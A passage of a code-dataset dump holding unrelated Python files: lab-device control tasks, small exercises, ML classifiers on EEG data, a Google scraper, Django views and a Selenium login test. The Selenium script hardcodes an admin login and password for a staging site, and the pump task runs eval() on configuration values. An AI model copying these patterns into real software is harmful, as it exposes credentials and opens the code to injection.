\"17\",\n \"args\": [0]\n },\n \"ft_1\": {\n \"id\": \"17\",\n \"args\": [1]\n }\n }\n\n def get_od_for_init(self):\n cmd = Command(self.device_id, \"5\",\n [self.od_channel],\n self.task_id,\n is_awaited=True)\n\n self.device.post_command(cmd)\n cmd.await_cmd()\n if cmd.is_valid:\n return cmd.response\n\n def measure_initial_od_average(self):\n data = []\n # 
collect the OD value from 5 measurements\n while len(data) < 5:\n od = self.get_od_for_init()\n if od is not None:\n data.append(od['od'])\n\n data.sort()\n computed = False\n average = 0\n\n # calculate the average OD from the measured data\n while not computed:\n\n mean = np.mean(data)\n median = np.median(data)\n\n if len(data) < 2:\n computed = True\n average = data[0]\n\n if mean / median <= 1:\n\n if mean / median >= 0.9:\n computed = True\n average = mean\n else:\n data = data[1:]\n else:\n data = data[:-1]\n return average\n\n def handle_outlier(self, measured_od) -> bool:\n \"\"\"\n Decides whether the measured OD value is an outlier or not.\n :param measured_od: optical density value\n :return: True if it is an outlier, False otherwise\n \"\"\"\n lower_tol = self.calculate_tolerance(-self.lower_tol)\n upper_tol = self.calculate_tolerance(self.upper_tol)\n\n if lower_tol <= measured_od <= upper_tol:\n self.outliers = 0\n self.average_od = self.calculate_average()\n return False\n else:\n self.outliers += 1\n if self.outliers > self.max_outliers:\n self.outliers = 0\n self.average_od = self.calculate_average()\n return False\n else:\n return True\n\n def calculate_tolerance(self, value):\n return ((100 + value) / 100) * self.average_od\n\n def calculate_average(self):\n \"\"\"\n Helper method which calculates the average of a list while removing the elements from the objects deque.\n :return: The average of the deque\n \"\"\"\n my_list = []\n while self.latest_values:\n my_list.append(self.latest_values.pop())\n\n return sum(my_list) / len(my_list)\n\n def start(self):\n t = Thread(target=self._run)\n t.start()\n\n def _run(self):\n self.average_od = self.measure_initial_od_average()\n od_variant = 'od_1' if self.od_channel == 1 else 'od_0'\n\n while self.is_active:\n commands = []\n\n for _name, _command in self.commands_to_execute.items():\n command = Command(self.device_id,\n _command.get(\"id\"),\n _command.get(\"args\", []),\n self.task_id,\n is_awaited=True)\n commands.append((_name, command))\n self.device.post_command(command, 1)\n\n for name, command in commands:\n command.await_cmd()\n if command.is_valid and name == od_variant:\n od = command.response['od']\n self.latest_values.appendleft(od)\n od_is_outlier = self.handle_outlier(od)\n if not od_is_outlier:\n self.od.value = od\n command.response = {'od': od, 'outlier': od_is_outlier, 'channel': self.od_channel}\n command.save_data_to_db()\n\n sleep(self.sleep_period)\n\n def end(self):\n self.is_active = False\n\n\nclass ePBRMeasureAll(PBRMeasureAll):\n def __init__(self, config):\n super(ePBRMeasureAll, self).__init__(config)\n self.commands_to_execute: Dict[str, dict] = {\n \"od_0\": {\n \"id\": \"5\",\n \"args\": [0]\n },\n \"od_1\": {\n \"id\": \"5\",\n \"args\": [1]\n },\n \"ph\": {\n \"id\": \"4\"\n },\n \"temp\": {\n \"id\": \"2\"\n }\n }\n\n\nclass PBRGeneralPump(BaseTask, Observer):\n\n def __init__(self, config):\n self.__dict__.update(config)\n\n required = ['min_od', 'max_od', 'pump_id', 'device_id',\n 'measure_all_task_id', 'pump_on_command', 'pump_off_command']\n\n self.validate_attributes(required, type(self).__name__)\n\n self.is_pump_on = False\n\n self.device = DeviceManager().get_device(self.device_id)\n self.od_task: PBRMeasureAll = TaskManager().get_task(self.measure_all_task_id)\n\n self.od_task.od.observe(self)\n\n super(PBRGeneralPump, self).__init__()\n\n def get_pump_command(self, state: bool) -> Command:\n if state:\n return Command(self.device_id, self.pump_on_command.get(\"command_id\"),\n 
eval(self.pump_on_command.get(\"arguments\", \"[]\")), self.task_id)\n else:\n return Command(self.device_id, self.pump_off_command.get(\"command_id\"),\n eval(self.pump_off_command.get(\"arguments\", \"[]\")), self.task_id)\n\n def update(self, observable: Observable):\n self.stabilize(observable.value)\n\n def start(self):\n pass\n\n def end(self):\n pass\n\n def is_od_value_too_high(self, od):\n return od > self.max_od\n\n def is_od_value_too_low(self, od):\n return od < self.min_od\n\n def turn_pump_on(self):\n self.change_pump_state(True)\n\n def turn_pump_off(self):\n self.change_pump_state(False)\n\n def change_pump_state(self, state: bool):\n for try_n in range(5):\n command = self.get_pump_command(state)\n self.device.post_command(command, 1)\n command.await_cmd()\n\n if isinstance(command.response['success'], bool) and command.response['success']:\n command.save_command_to_db()\n self.is_pump_on = state\n return\n raise ConnectionError\n\n def stabilize(self, od):\n if self.is_od_value_too_high(od):\n if not self.is_pump_on:\n self.turn_pump_on()\n elif self.is_od_value_too_low(od):\n if self.is_pump_on:\n self.turn_pump_off()\n","sub_path":"custom/tasks/PBR.py","file_name":"PBR.py","file_ext":"py","file_size_in_byte":8439,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"306260824","text":"import os\nimport requests\n\nrecords_list = []\nzname = \"tempdata/ssa-babynames-nationwide-2014.txt\"\nf = open(zname, 'r')\nfor line in f:\n name, sex, babies = line.strip().split(',')\n row = [name, sex, int(babies)]\n records_list.append(row)\n\nrecords_list.sort(key=lambda x: x[2], reverse=True)\n\nfor x in range(0, 10):\n name, sex, baby = records_list[x]\n print(str(x+1)+\". \"+name+\",\"+sex+\",\"+str(baby))\n","sub_path":"exercises/0013-sorted-names/b.py","file_name":"b.py","file_ext":"py","file_size_in_byte":409,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"56311447","text":"import socket\nimport select\nimport json\nimport time\n\naddress = '127.0.0.1'\nport = 7777\n\nclass Sock:\n def __init__(self, family, type):\n self.family = family\n self.type = type\n\n def sock(self):\n return socket.socket(self.family, self.type, proto=0)\n\nclass JIM_message:\n def __init__(self, user_name, status):\n self.user = user_name\n self.status = status\n\n def message(self):\n return json.dumps({\n \"action\": \"presence\",\n \"time\": time.time(),\n \"type\": \"status\",\n \"user\": {\n \"account_name\": self.user,\n \"status\": self.status\n }\n }\n )\n\nclass JIM_response:\n def __init__(self, message):\n self.message = message\n\n def res_message(self):\n return json.loads(self.message.decode(\"utf-8\"))\n\n\ndef server_mainloop(sock, clients):\n while 1:\n try:\n connect, addr = sock.accept()\n except OSError as err:\n pass\n else:\n print(\"Connection request from %s\" % str(addr))\n clients.append(connect)\n finally:\n w = []\n try:\n r, w, err = select.select([], clients, [], 1)\n except Exception as exc:\n pass\n for i in w:\n try:\n user_name = input(\"Please, print your name: \")\n status = input(\"Please, print your status: \")\n msg = JIM_message(user_name, status)\n msg_json = JIM_message.message(msg)\n i.send(msg_json.encode(\"utf-8\"))\n except:\n clients.remove(i)\n\n\ndef client_mainloop(s):\n\n while 1:\n message = s.recv(1024)\n message1 = JIM_response(message)\n message2 = JIM_response.res_message(message1)\n print(message2)\n\n 
s.close()\n","sub_path":"HW_3/content.py","file_name":"content.py","file_ext":"py","file_size_in_byte":1998,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"326387782","text":"def robot_in_a_grid(grid):\n stack = []\n modified_dfs(1, 1, grid, stack)\n stack.reverse()\n return stack\n\n\ndef modified_dfs(row, col, grid, stack):\n if row >= len(grid) or col >= len(grid[0]):\n return False\n \n if grid[row][col] == '#':\n return False\n\n if grid[row][col] == '*':\n return True\n\n stack.append('R')\n if modified_dfs(row, col + 1, grid, stack):\n return True\n stack.pop()\n stack.append('D')\n if modified_dfs(row + 1, col, grid, stack):\n return True\n stack.pop()\n\n return False\n\n\ndef main():\n maze = ['#####',\n '#+..#',\n '#.###',\n '#...#',\n '#..##',\n '##..*']\n stack = robot_in_a_grid(maze)\n while len(stack) != 0:\n print(stack.pop())\n\n\nmain()\n \n\n\n","sub_path":"ctci/ch8/robotinagrid.py","file_name":"robotinagrid.py","file_ext":"py","file_size_in_byte":809,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"432228129","text":"import warnings\r\nimport matplotlib.pyplot as plt\r\nimport seaborn as sns\r\nimport pandas as pd\r\nimport numpy as np\r\nfrom sklearn.ensemble import RandomForestClassifier, ExtraTreesClassifier\r\nfrom sklearn.linear_model import LogisticRegression\r\nfrom sklearn.model_selection import KFold\r\nfrom sklearn.model_selection import train_test_split\r\nfrom keras.layers import Dense\r\nfrom keras.models import Sequential\r\nfrom sklearn.metrics import accuracy_score\r\nfrom sklearn.multiclass import OneVsRestClassifier\r\nfrom sklearn.preprocessing import LabelEncoder, OneHotEncoder\r\nfrom sklearn.svm import SVC\r\nfrom sklearn.svm import LinearSVC\r\nfrom sklearn.metrics import classification_report, confusion_matrix, accuracy_score, f1_score, recall_score, precision_score\r\nfrom sklearn import datasets, tree\r\nfrom sklearn.decomposition import PCA\r\nfrom sklearn.discriminant_analysis import LinearDiscriminantAnalysis\r\nfrom sklearn.feature_selection import SelectKBest\r\nfrom sklearn.feature_selection import chi2\r\n\r\ndef extract_data():\r\n\r\n filename1 = './Data/DEI_trial_by_trial_Right.xlsx'\r\n filename2 = './Data/DEI_trial_by_trial_Wrong.xlsx'\r\n filename3 = './Data/esec_trial_by_trial_Right.xlsx'\r\n filename4 = './Data/esec_trial_by_trial_Wrong.xlsx'\r\n\r\n filename = [filename1, filename2, filename3, filename4]\r\n right_wrong_files = [1, 0, 1, 0]\r\n\r\n number_trial_training = 12\r\n number_trial_testing = 36\r\n\r\n \r\n X = []\r\n y = []\r\n listIndex = [\r\n 'DEI_01', 'DEI_02', 'DEI_03', 'DEI_04', 'DEI_05', 'DEI_06', 'DEI_07', 'DEI_08',\r\n 'DEI_09', 'DEI_10', 'DEI_11', 'DEI_12', 'DEI_13', 'DEI_14', 'DEI_15', 'DEI_16',\r\n 'DEI_17', 'DEI_18', 'DEI_19', 'DEI_20', 'DEI_21', 'DEI_22', 'DEI_23', 'DEI_24',\r\n 'ESEC_01', 'ESEC_02', 'ESEC_03', 'ESEC_04', 'ESEC_05', 'ESEC_07', 'ESEC_08',\r\n 'ESEC_09', 'ESEC_10', 'ESEC_11', 'ESEC_12', 'ESEC_13', 'ESEC_14', 'ESEC_15', 'ESEC_16',\r\n 'ESEC_17', 'ESEC_18', 'ESEC_19', 'ESEC_20', 'ESEC_21'\r\n ]\r\n\r\n list_right_wrong = np.zeros((len(listIndex), number_trial_training + number_trial_testing + 1), dtype=object)\r\n\r\n i = 0\r\n while i < len(list_right_wrong):\r\n j = 0\r\n while j < len(list_right_wrong[i]):\r\n list_right_wrong[i][j] = -1\r\n j += 1\r\n i += 1\r\n\r\n list_gender = [\r\n 'M', 'F', 'F', 'M', 'M', 'M', 'M', 'F', # DEI 1-8\r\n 'F', 'M', 'M', 'M', 'M', 'M', 'M', 
'M', # DEI 9-16\r\n 'M', 'M', 'M', 'F', 'F', 'F', 'M', 'M', # DEI 17-24\r\n 'M', 'F', 'F', 'M', 'F', 'M', 'M', # ESEC 1-8\r\n 'M', 'F', 'F', 'M', 'M', 'M', 'F', 'M', # ESEC 9-16\r\n 'M', 'F', 'F', 'F', 'M' # ESEC 17-21\r\n ]\r\n\r\n index = 0\r\n while index < len(filename):\r\n y = []\r\n i = 1\r\n while i <= (number_trial_training + number_trial_testing):\r\n if i <= number_trial_training:\r\n worksheet = pd.read_excel(filename[index], sheet_name='TRIAL TRAINING' + str(i)) # doctest: +SKIP\r\n y.append('TRIAL TRAINING' + str(i))\r\n else:\r\n worksheet = pd.read_excel(filename[index], sheet_name='TRIAL TESTING' + str(i-number_trial_training)) # doctest: +SKIP\r\n y.append('TRIAL TESTING' + str(i-number_trial_training))\r\n\r\n X = list(worksheet[worksheet.columns[-1]])\r\n\r\n j = 0\r\n while j < len(X):\r\n subject = listIndex.index(X[j])\r\n\r\n if list_right_wrong[subject][i - 1] == 1 or list_right_wrong[subject][i - 1] == 0:\r\n list_right_wrong[subject][i - 1] = -1\r\n else:\r\n list_right_wrong[subject][i - 1] = right_wrong_files[index]\r\n \r\n if list_gender[subject] == 'M':\r\n list_right_wrong[subject][-1] = 'Rapaz'\r\n else:\r\n list_right_wrong[subject][-1] = 'Rapariga'\r\n \r\n j += 1\r\n \r\n i += 1\r\n \r\n index += 1\r\n\r\n y.append('GENDER')\r\n \r\n df = pd.DataFrame(list_right_wrong, index = listIndex, columns = y)\r\n return df\r\n\r\n\r\ndef divide_data_train_test(X, y):\r\n \r\n print(\"X:\\n\", X)\r\n print(\"y:\\n\", y)\r\n X_train, X_val_and_test, y_train, y_val_and_test = train_test_split(X, y, test_size=0.35, random_state=1)\r\n X_val, X_test, y_val, y_test = train_test_split(X_val_and_test, y_val_and_test, test_size=0.6, random_state=1)\r\n return X_train, X_test, y_train, y_test, X_val, y_val\r\n\r\n\r\ndef kFold(X, y):\r\n\r\n kf = KFold(n_splits=5)\r\n print(kf.get_n_splits(X))\r\n\r\n for train_index, test_index in kf.split(X):\r\n print(\"TRAIN:\", train_index, \"TEST:\", test_index)\r\n X_train, X_test = np.array(X)[train_index], np.array(X)[test_index]\r\n y_train, y_test = np.array(y)[train_index], np.array(y)[test_index]\r\n\r\n\r\n return X_train, X_test, y_train, y_test\r\n\r\n\r\ndef PCA_decomp(X_train, X_test):\r\n pca = PCA(n_components=2)\r\n\r\n X_train = pca.fit_transform(X_train)\r\n X_test = pca.transform(X_test)\r\n\r\n print(pca.components_)\r\n print(pca.explained_variance_)\r\n\r\n return X_train, X_test\r\n\r\n\r\ndef Fisher():\r\n clf = LinearDiscriminantAnalysis()\r\n clf.fit(X, y)\r\n clf.predict([[-0.8, -1]])\r\n\r\ndef Decision_Tree_Classifier(X_train, X_test, y_train):\r\n dtc_clf = tree.DecisionTreeClassifier()\r\n dtc_clf = dtc_clf.fit(X_train, y_train)\r\n dtc_prediction = dtc_clf.predict(X_test)\r\n return dtc_prediction\r\n\r\ndef Random_Forest_Classifier(X_train, X_test, y_train):\r\n rfc_clf = RandomForestClassifier()\r\n rfc_clf.fit(X_train, y_train)\r\n rfc_prediction = rfc_clf.predict(X_test)\r\n return rfc_prediction\r\n\r\n\r\ndef Logistic_Regression(X_train, X_test, y_train):\r\n # LogisticRegression\r\n l_clf = OneVsRestClassifier(LogisticRegression(solver='lbfgs'))\r\n l_clf.fit(X_train, y_train)\r\n l_prediction = l_clf.predict(X_test)\r\n return l_prediction\r\n\r\ndef neural_network(X_train, X_test, y_train, y_test, X_val, y_val):\r\n # Initialising the ANN\r\n model = Sequential()\r\n\r\n # Adding the input layer and the first hidden layer\r\n model.add(Dense(32, activation='relu', input_dim=48))\r\n\r\n # Adding the second hidden layer\r\n model.add(Dense(units=32, activation='relu'))\r\n\r\n # Adding the 
output layer\r\n model.add(Dense(units=1, activation='sigmoid'))\r\n\r\n model.compile(optimizer='adam', loss='mean_squared_error', metrics=['accuracy'])\r\n\r\n\r\n # Fit the model weights.\r\n hist = model.fit(X_train, y_train, batch_size=64, epochs=100, verbose=1, validation_data=(X_val, y_val))\r\n\r\n model.summary()\r\n\r\n y_pred = model.predict(X_test)\r\n # Converting predictions to label\r\n pred = list()\r\n for i in range(len(y_pred)):\r\n pred.append(np.int(np.round(y_pred[i])))\r\n # Converting one hot encoded test label to label\r\n test = list()\r\n for i in range(len(y_test)):\r\n test.append(y_test[i])\r\n\r\n \"\"\"\r\n a = accuracy_score(pred, test)\r\n print(\"y_label:\", y_test)\r\n print(\"y_pred:\", y_pred)\r\n print(\"\\n\")\r\n print(\"%s: %.2f%%\" % (model.metrics_names[1], a * 100))\r\n print(\"label:\", test)\r\n print(\"pred:\", pred)\r\n print(\"The Mean Absolute Error: %.0f class\" % mean_absolute_error(y_test, pred, multioutput='raw_values'))\r\n print(\"The Median Absolute Error: %.0f class\" % median_absolute_error(y_test, pred, multioutput='raw_values'))\r\n\r\n\r\n\r\n plt.plot(hist.history['loss'])\r\n plt.plot(hist.history['val_loss'])\r\n plt.title('Model loss')\r\n plt.ylabel('Loss')\r\n plt.xlabel('Epoch')\r\n plt.legend(['Train', 'Val'], loc='upper right')\r\n plt.show()\r\n\r\n plt.plot(hist.history['accuracy'])\r\n plt.plot(hist.history['val_accuracy'])\r\n plt.title('Model accuracy')\r\n plt.ylabel('Accuracy')\r\n plt.xlabel('Epoch')\r\n plt.legend(['Train', 'Val'], loc='lower right')\r\n plt.show()\r\n\r\n \"\"\"\r\n\r\n return pred\r\n\r\ndef SVM(X_train, X_test, y_train):\r\n\r\n svclassifier = OneVsRestClassifier(LinearSVC(C=1.0, max_iter=1000, tol=1e-05, verbose=0))\r\n svclassifier.fit(X_train, y_train)\r\n svm_pred = svclassifier.predict(X_test)\r\n return svm_pred\r\n\r\n\r\nif __name__ == \"__main__\":\r\n warnings.filterwarnings(\"ignore\", category=FutureWarning)\r\n warnings.filterwarnings(\"ignore\", category=DeprecationWarning)\r\n data_frame = extract_data()\r\n data_frame = pd.get_dummies(data_frame, columns=['GENDER'])\r\n features = data_frame.columns\r\n\r\n X = data_frame[features[:-2]]\r\n y = data_frame[features[-2]]\r\n print(\"X:\", X)\r\n print(\"y:\", y)\r\n\r\n\r\n X_train, X_test, y_train, y_test, X_val, y_val = divide_data_train_test(X, y)\r\n #X_train, X_test, y_train, y_test = kFold(X, y)\r\n\r\n #X_train, X_test = PCA_decomp(X_train, X_test)\r\n\r\n print(\"X_train:\", X_train.shape)\r\n print(\"X_test:\", X_test.shape)\r\n\r\n # printing the shapes of the new y objects\r\n print(\"Y_train:\", y_train.shape)\r\n print(\"Y_test:\", y_test.shape)\r\n\r\n\r\n\r\n pred = neural_network(X_train, X_test, y_train, y_test, X_val, y_val)\r\n\r\n dtc_prediction = Decision_Tree_Classifier(X_train, X_test, y_train)\r\n rfc_prediction = Random_Forest_Classifier(X_train, X_test, y_train)\r\n l_prediction = Logistic_Regression(X_train, X_test, y_train)\r\n svm_pred = SVM(X_train, X_test, y_train)\r\n\r\n # accuracy scores\r\n neural_acc = accuracy_score(pred, y_test)\r\n print(\"Neural: \",neural_acc)\r\n\r\n dtc_tree_acc = accuracy_score(dtc_prediction, y_test)\r\n print(\"Decision tree: \",dtc_tree_acc)\r\n\r\n rfc_acc = accuracy_score(rfc_prediction, y_test)\r\n print(\"Random Forest: \",rfc_acc)\r\n\r\n l_acc = accuracy_score(l_prediction, y_test)\r\n print(\"Logistic regression: \",l_acc)\r\n svm_acc = accuracy_score(svm_pred, y_test)\r\n print(\"SVM: \",svm_acc)\r\n\r\n\r\n\r\n cm = confusion_matrix(y_test, 
rfc_prediction)\r\n\r\n # Transform to df for easier plotting\r\n cm_df = pd.DataFrame(cm,\r\n index=['0', '1'],\r\n columns=['0', '1'])\r\n\r\n plt.figure(figsize=(5.5, 4))\r\n sns.heatmap(cm_df, annot=True)\r\n plt.title('Random Forest')\r\n plt.ylabel('True label')\r\n plt.xlabel('Predicted label')\r\n plt.show()\r\n\r\n classifiers = ['Neural Network', 'Decision Tree', 'Random Forest', 'Logistic Regression', 'SVM']\r\n\r\n accuracy = np.array([neural_acc, dtc_tree_acc, rfc_acc, l_acc, svm_acc])\r\n\r\n max_acc = np.argmax(accuracy)\r\n print(classifiers[max_acc] + ' is the best classifier for this problem')\r\n","sub_path":"Project_Raven.py","file_name":"Project_Raven.py","file_ext":"py","file_size_in_byte":10576,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"404932021","text":"from bs4 import BeautifulSoup\nfrom urllib.request import Request, urlopen\nfrom urllib.parse import urlparse, parse_qs\n\n\nclass GoogleSearch:\n\n def __init__(self):\n self.url = \"\"\n self.user_agent = 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)'\n self.html = \"\"\n self.links = list()\n self.pdfs = list()\n\n def query(self, search):\n search = search.replace(' ', '+')\n self.url = \"https://www.google.com/search?q=\" + search + \"&num=100\" # maybe change 100 to 50-80?\n return self.url\n\n def get_page(self):\n r = Request(self.url)\n r.add_header('User-Agent', self.user_agent)\n response = urlopen(r)\n self.html = response.read()\n response.close()\n\n def get_results(self):\n hashes = set()\n self.get_page()\n\n soup = BeautifulSoup(self.html, 'html.parser')\n\n for anchor in soup.find(id='search').find_all('a'):\n if not anchor.parent or anchor.parent.name.lower() != \"h3\":\n continue\n\n try:\n link = anchor['href']\n except KeyError:\n continue\n\n link = self.filter_result(link)\n if not link:\n continue\n\n h = hash(link)\n if h in hashes:\n continue\n hashes.add(h)\n\n self.links.append(link)\n\n def get_pdfs(self):\n for link in self.links:\n if link.endswith(\".pdf\"):\n self.pdfs.append(link)\n\n return self.pdfs\n\n @staticmethod\n def filter_result(link):\n parse = urlparse(link, 'http')\n\n if link.startswith('/url'):\n link = parse_qs(parse.query)['q'][0]\n\n parse = urlparse(link, 'http')\n if parse.netloc and 'google' not in parse.netloc:\n return link\n","sub_path":"googlesearch.py","file_name":"googlesearch.py","file_ext":"py","file_size_in_byte":1849,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"356496880","text":"#coding: utf-8\n\nfrom django.contrib import messages\nfrom django.shortcuts import render, redirect\nfrom catalog.models import Builder\nfrom catalog.forms.FormBuilder import FormBuilder\n\n\ndef index(request):\n\n\tbuilders = Builder.objects.all()\n\n\treturn render(request, 'builder/index.html', {\n\t\t'builders': builders\n\t})\n\ndef add(request):\n\t\n\tif request.method == 'POST':\n\n\t\tform = FormBuilder(request.POST)\n\n\t\tif form.is_valid():\n\t\t\tbuilder = Builder()\n\t\t\tbuilder.name = request.POST['name']\n\t\t\tbuilder.phone = request.POST['phone']\n\t\t\tbuilder.address = request.POST['address']\n\t\t\tbuilder.number = request.POST['number']\n\t\t\tbuilder.complement = request.POST['complement'] \n\t\t\tbuilder.save()\n\n\t\t\tmessages.success(request, 'Record saved successfully!')\n\t\t\treturn redirect('/builder/')\n\t\telse:\n\t\t\tmessages.warning(request, 'Error occurred! 
Try again!')\n\t\t\treturn redirect('/builder/')\n\telse:\n\t\tform = FormBuilder()\n\n\treturn render(request, 'builder/add.html', {\n\t\t'form':form\n\t})\n\ndef edit(request, builder_id):\n\n\tbuilder = Builder.objects.get(pk=builder_id)\n\n\tif request.method == 'POST':\n\n\t\tform = FormBuilder(request.POST)\n\n\t\tif form.is_valid():\n\n\t\t\tbuilder.name = request.POST['name']\n\t\t\tbuilder.phone = request.POST['phone']\n\t\t\tbuilder.address = request.POST['address']\n\t\t\tbuilder.number = request.POST['number']\n\t\t\tbuilder.complement = request.POST['complement'] \n\t\t\tbuilder.save()\n\t\t\t\n\t\t\tmessages.success(request, 'Record updated successfully!')\n\t\t\treturn redirect('/builder/')\n\t\telse:\n\t\t\tmessages.warning(request, 'Error occurred! Try again!')\n\t\t\treturn redirect('/builder/')\n\telse:\n\n\t\tdata = {'name':builder.name,\n\t\t\t\t'phone':builder.phone,\n\t\t\t\t'address':builder.address,\n\t\t\t\t'number':builder.number,\n\t\t\t\t'complement':builder.complement}\n\n\t\tform = FormBuilder(initial=data)\n\n\treturn render(request, 'builder/edit.html',{\n\t\t'form':form,\n\t\t'builder_id':builder.id\n\t})\n\ndef delete(request, builder_id):\n\n\tbuilder = Builder.objects.get(pk=builder_id)\n\tbuilder.delete()\n\tmessages.success(request, 'Record deleted successfully!')\n\t\n\treturn redirect('/builder/')","sub_path":"instruments/catalog/views/builder.py","file_name":"builder.py","file_ext":"py","file_size_in_byte":2093,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"359388904","text":"# Load the IMDB dataset\nfrom keras.datasets import imdb\nimport numpy as np\n\n(train_data, train_labels), (test_data,\n test_labels) = imdb.load_data(num_words=10000)\n# print(train_data[0])\n# print(train_labels[0])\n# print(max([max(sequence) for sequence in train_data]))\n\nword_index = imdb.get_word_index()\nreverse_word_index = dict([(value, key)\n for (key, value) in word_index.items()])\ndecoded_review = ' '.join(reverse_word_index.get(i-3, '?')\n for i in train_data[0])\n# print(decoded_review)\n\n# Encode the nested integer lists as a binary matrix\ndef vectorize_sequence(sequences, dimension=10000):\n results = np.zeros((len(sequences), dimension))\n for i, sequence in enumerate(sequences):\n results[i, sequence] = 1.\n return results\n\nx_train = vectorize_sequence(train_data)\nx_test = vectorize_sequence(test_data)\n\n# print(x_train[0])\n\ny_train = np.asarray(train_labels).astype('float32')\ny_test = np.asarray(test_labels).astype('float32')","sub_path":"A03_Machine_learning/B01_Keras/03_start/03-04.py","file_name":"03-04.py","file_ext":"py","file_size_in_byte":1030,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"185180969","text":"from selenium import webdriver\ndriver = webdriver.Chrome(executable_path=r'C:\\Program Files\\Chromedriver\\chromedriver.exe')\nfrom selenium.webdriver.common.keys import Keys\nimport time\n\n\ndriver.get('http://admin.staging.yinhe.t1t.in/auth/login')\ndriver.maximize_window()\n\nuser = driver.find_element_by_id('login')\nuser.send_keys('t1_qaadmin')\npas = driver.find_element_by_id('password')\npas.send_keys('47fCRYx9')\npas.send_keys(Keys.RETURN)\n\ntime.sleep(2)\n\na = driver.find_element_by_class_name('nav.navbar-nav.navbar-right')\na.find_element_by_id('user-link').click()\ntime.sleep(2)\ndriver.find_element_by_id('logout').click()\ntime.sleep(2)\n\npopup = 
driver.switch_to.alert\npopup.accept()\ntime.sleep(5)\ndriver.quit()\n\n","sub_path":"Yinhe(Staging)/Yinhe/Test_SBE.py","file_name":"Test_SBE.py","file_ext":"py","file_size_in_byte":714,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"320255058","text":"from pathlib import Path\nimport pandas as pd\nimport mne\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom pyedflib import highlevel\nimport pyedflib\n\n\nEEG_channels = [\"FP1\",\"FP2\",\"AF3\",\"AF4\",\"F7\",\"F3\",\"FZ\",\"F4\",\n \"F8\",\"FC5\",\"FC1\",\"FC2\",\"FC6\",\"T7\",\"C3\",\"CZ\",\n \"C4\",\"T8\",\"CP5\",\"CP1\",\"CP2\",\"CP6\",\"P7\",\"P3\",\n \"PZ\",\"P4\",\"P8\",\"PO7\",\"PO3\",\"PO4\",\"PO8\",\"OZ\"]\n\n# General settings and file paths\nmne.set_log_level(\"WARNING\")\n\nif __name__ == \"__main__\":\n ##EXP2\n srcPath = \"C:\\\\Users\\\\asus\\\\OneDrive - purdue.edu\\\\RealtimeProject\\\\Experiment2-Data\\\\Dataset\\\\U10\\\\S02\\\\Sensor-Data\\\\Process-Eeg\\\\txt\"\n dstPath = \"C:\\\\Users\\\\asus\\\\OneDrive - purdue.edu\\\\RealtimeProject\\\\Experiment2-Data\\\\Dataset\\\\U10\\\\S02\\\\Sensor-Data\\\\Process-Eeg\\\\edf\"\n\n #EXP1\n # srcPath = \"C:\\\\Users\\\\asus\\\\OneDrive - purdue.edu\\\\RealtimeProject\\\\Experiment1-Pilot\\\\UI07\\\\raw_txt\"\n # dstPath = \"C:\\\\Users\\\\asus\\\\OneDrive - purdue.edu\\\\RealtimeProject\\\\Experiment1-Pilot\\\\UI07\\\\raw_edf\"\n\n # srcPath = \"./data5/src\"\n # dstPath = \"./data5/dst\"\n\n summaryFile = open(\"./summary.txt\",'w')\n\n src = Path(srcPath)\n dst = Path(dstPath)\n\n for file in src.rglob(\"*.txt\"):\n print(\"Processsing \",file.name)\n\n p2 = dst / file.parent.name\n user = file.parent.name\n destinationFile = dst / file.with_suffix(\".edf\").name\n\n # if not p2.exists():\n # p2.mkdir(parents=True)\n\n sfreq = 250\n df = pd.read_csv(file)\n data = df[EEG_channels].values.transpose()\n\n # Create writer\n writer = pyedflib.EdfWriter(str(destinationFile), len(EEG_channels), file_type=1)\n\n # Create header\n writer.setPatientName(user)\n\n #Set label\n # label = df['label'].values.mean()\n # label = \"low workload\" if label < 7.5 else \"high workload\"\n # writer.setPatientAdditional(label)\n\n # Signals\n signal_headers = highlevel.make_signal_headers(EEG_channels, sample_rate=250)\n writer.setSignalHeaders(signal_headers)\n writer.writeSamples(data)\n\n #close\n writer.close()\n\n","sub_path":"ConvertDatasetToEdf.py","file_name":"ConvertDatasetToEdf.py","file_ext":"py","file_size_in_byte":2125,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"154939148","text":"import DataLoader as DL\nimport os.path as path\n\nseason = 2020\n\npath_league_data = path.join(path.dirname(path.dirname(path.abspath(__file__))), 'Cache', 'league_standings_full.csv')\npath_league_data_full = path.join(path.dirname(path.dirname(path.abspath(__file__))), 'Cache', 'league_data_full.csv')\n\nDataLoaderObj = DL.DataLoader()\nDataLoaderObj.scrape_league_standings(path_league_data_full,\n path_league_data,\n league_id=1217918,\n league_type='classic')\n","sub_path":"Code Old/scrape_league_data.py","file_name":"scrape_league_data.py","file_ext":"py","file_size_in_byte":569,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"243340416","text":"import wx\nfrom wx.lib.pubsub import pub\nimport ticTacToe\nimport rockPaperScissors\nfrom client import *\nfrom time import sleep\nimport wx.grid as grid\nimport 
